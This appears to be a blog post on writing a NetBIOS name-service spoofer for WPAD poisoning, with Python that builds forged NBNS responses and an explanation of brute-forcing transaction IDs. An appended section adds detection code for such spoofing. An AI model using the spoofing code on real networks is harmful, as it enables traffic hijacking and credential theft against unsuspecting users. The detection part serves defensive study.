So since Potato recently got an update I decided to put this together. Now you don't need to mess with Responder if you don't want to... although you should, since it's badass! The funny part about this is I actually threw it together in about 20 minutes. Something must be working because I'm improving a lot more recently.
I'll give a little explanation, but the code is very, very readable and I left plenty of comments in there so you can see what's going on.
This is the insane way the NetBIOS name is encoded. So if I were to use WPAD as the example, it would look like this:
'FHFAEBEECACACACACACACACACACACAAA'
And if I were to use DISABLEWPADNOW, it would look like this:
'EEEJFDEBECEMEFFHFAEBEEEOEPFHCAAA'
def make_nbname(name):
    spoof_name = name.upper()
    # First-level encoding: each byte becomes two letters, 'A' + high nibble then 'A' + low nibble
    encoded_name = ''.join([chr((ord(c) >> 4) + ord('A'))
                            + chr((ord(c) & 0xF) + ord('A')) for c in spoof_name])
    padding = "CA" * (15 - len(spoof_name))  # "CA" is an encoded space (0x20); names are padded to 15 bytes
    # 0x20 is the label length (32 encoded chars); role[n] supplies the encoded suffix byte plus the NUL terminator
    return b'\x20' + (encoded_name + padding).encode('ascii') + role[0]
The '\x20' above is the start of an answer reply, and the role comes from this dict. You can use any one of these; I have not tried them all, but I really should.
role = {
    0: b"\x41\x41\x00",  # "Workstation/Redirector" (suffix 0x00)  # normal
    1: b"\x42\x4c\x00",  # "Domain Master Browser" (suffix 0x1b)
    2: b"\x42\x4d\x00",  # "Domain Controller" (suffix 0x1c)
    3: b"\x42\x4e\x00",  # "Local Master Browser" (suffix 0x1d)
    4: b"\x42\x4f\x00",  # "Browser Election" (suffix 0x1e)
    5: b"\x43\x41\x00",  # "File Server" (suffix 0x20)
    6: b"\x41\x42\x00",  # "Browser" (suffix 0x01)
}
Here is how we make our packet; I ripped most of it from Metasploit.
import socket
import struct

sec = 255  # TTL in seconds; 255 = 4min 15sec

def make_packet(name, return_ip):
    pkt = b'\x00\x00'   # TID placeholder; better to fill it in on the fly than call the method over and over
    pkt += b"\x85\x00"  # Flags = response + authoritative + recursion desired
    pkt += b"\x00\x00"  # Questions = 0
    pkt += b"\x00\x01"  # Answer RRs = 1
    pkt += b"\x00\x00"  # Authority RRs = 0
    pkt += b"\x00\x00"  # Additional RRs = 0
    pkt += make_nbname(name)  # original query name, first-level encoded
    pkt += b"\x00\x20"  # Type = NB (0x0020), the NetBIOS name record type
    pkt += b"\x00\x01"  # Class = IN
    pkt += struct.pack('>I', sec)  # TTL, 4 bytes big-endian; \x00\x00\x00\xff = 4min 15sec
    pkt += b"\x00\x06"  # Data length = 6 (2 bytes NB flags + 4 bytes IPv4 address)
    pkt += b"\x00\x00"  # NB flags: B-node, unique name
    pkt += socket.inet_aton(return_ip)  # 32-bit packed binary; ipv6 uses socket.inet_pton()
    return pkt
The one thing to really pay attention to is the struct part: that is how we encode the TTL (Time To Live). It is 4 bytes long, big-endian, and expressed in seconds, so 60 seconds becomes '\x00\x00\x00\x3c', and 10 minutes is 10 * 60 = 600 seconds, which is 0x0258 in hex, so it looks like '\x00\x00\x02\x58'. Anyway, none of that should matter; just define sec = 60 and you're good to go. It defaults to 255, FYI, which is 4 minutes 15 seconds :)
The very last part is how the whole thing works: whenever your computer makes an NBNS request, there is a 2-byte Transaction ID associated with it. This I guess was supposed to prevent this very thing from happening, or maybe it was designed as a check; I'm not sure. Regardless, since it's 2 bytes there are only 65,535 possible numbers and we simply loop through all of them. On a modern LAN this is not an issue, and it turns out to be roughly 4.4 Mbytes of data.
And there you have it; it's actually rather easy. I would recommend using Responder for now, but if anyone ever needs it, this is how it's done :)
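As an added example that is not part of the original post or the linked repository, here is the receiving side of the layout above, written from a monitoring standpoint: it inverts the first-level name encoding, parses one-answer NBNS responses, and flags answers for names that should never resolve on the LAN (the post's WPAD example) as well as bursts of distinct transaction IDs for one name from one source, the footprint the looping described above leaves. The watch list, the threshold of 50 and the sample packet bytes are constructed assumptions, not captured traffic.

```python
import socket
import struct
from collections import defaultdict

def decode_nbname(encoded):
    """Invert the first-level encoding: two letters 'A'..'P' per byte (high nibble, then low nibble)."""
    if len(encoded) != 32 or any(c not in "ABCDEFGHIJKLMNOP" for c in encoded):
        raise ValueError("not a 32-character first-level NetBIOS name")
    raw = bytes(((ord(encoded[i]) - 0x41) << 4) | (ord(encoded[i + 1]) - 0x41)
                for i in range(0, 32, 2))
    # 15 name bytes padded with spaces ("CA"), then the one-byte suffix (the post's 'role')
    return raw[:15].rstrip(b" ").decode("ascii"), raw[15]

def parse_nbns_response(pkt):
    """Parse a single-answer NBNS response laid out as in the post into a dict of its fields."""
    tid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    if not flags & 0x8000 or an != 1:
        raise ValueError("not a one-answer NBNS response")
    label_len = pkt[12]
    name, suffix = decode_nbname(pkt[13:13 + label_len].decode("ascii"))
    off = 13 + label_len + 1                         # skip the terminating NUL label
    rr_type, _cls, ttl, rdlen, nb_flags = struct.unpack(">HHIHH", pkt[off:off + 12])
    if rr_type != 0x20 or rdlen != 6:
        raise ValueError("not an NB record carrying one address")
    return {"tid": tid, "name": name, "suffix": suffix, "ttl": ttl,
            "group": bool(nb_flags & 0x8000), "ip": socket.inet_ntoa(pkt[off + 12:off + 16])}

def flag_spoofing(packets, watch_names=("WPAD",), tid_threshold=50):
    """Alerts for answers to names that should never resolve, and for transaction-ID spraying."""
    alerts, tids_seen = [], defaultdict(set)
    for pkt in packets:
        try:
            rr = parse_nbns_response(pkt)
        except (ValueError, struct.error, IndexError):
            continue
        if rr["name"] in watch_names:
            alerts.append("answer for %s from %s (ttl %d)" % (rr["name"], rr["ip"], rr["ttl"]))
        tids_seen[(rr["name"], rr["ip"])].add(rr["tid"])
    for (name, ip), tids in tids_seen.items():
        if len(tids) >= tid_threshold:
            alerts.append("%d distinct transaction IDs for %s from %s" % (len(tids), name, ip))
    return alerts

def build_sample(tid):
    """Constructed sample response (not a capture): WPAD -> 192.0.2.10, TTL 255, unique B-node name."""
    return (struct.pack(">HHHHHH", tid, 0x8500, 0, 1, 0, 0)
            + b"\x20FHFAEBEECACACACACACACACACACACAAA\x00"
            + struct.pack(">HHIHH", 0x20, 1, 255, 6, 0) + socket.inet_aton("192.0.2.10"))
```

Feeding `flag_spoofing` the UDP/137 payloads from a capture gives one alert per watched name answered and one per (name, source) pair that cycles through many transaction IDs.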
The code can be found here https://github.com/trump0dump/netbios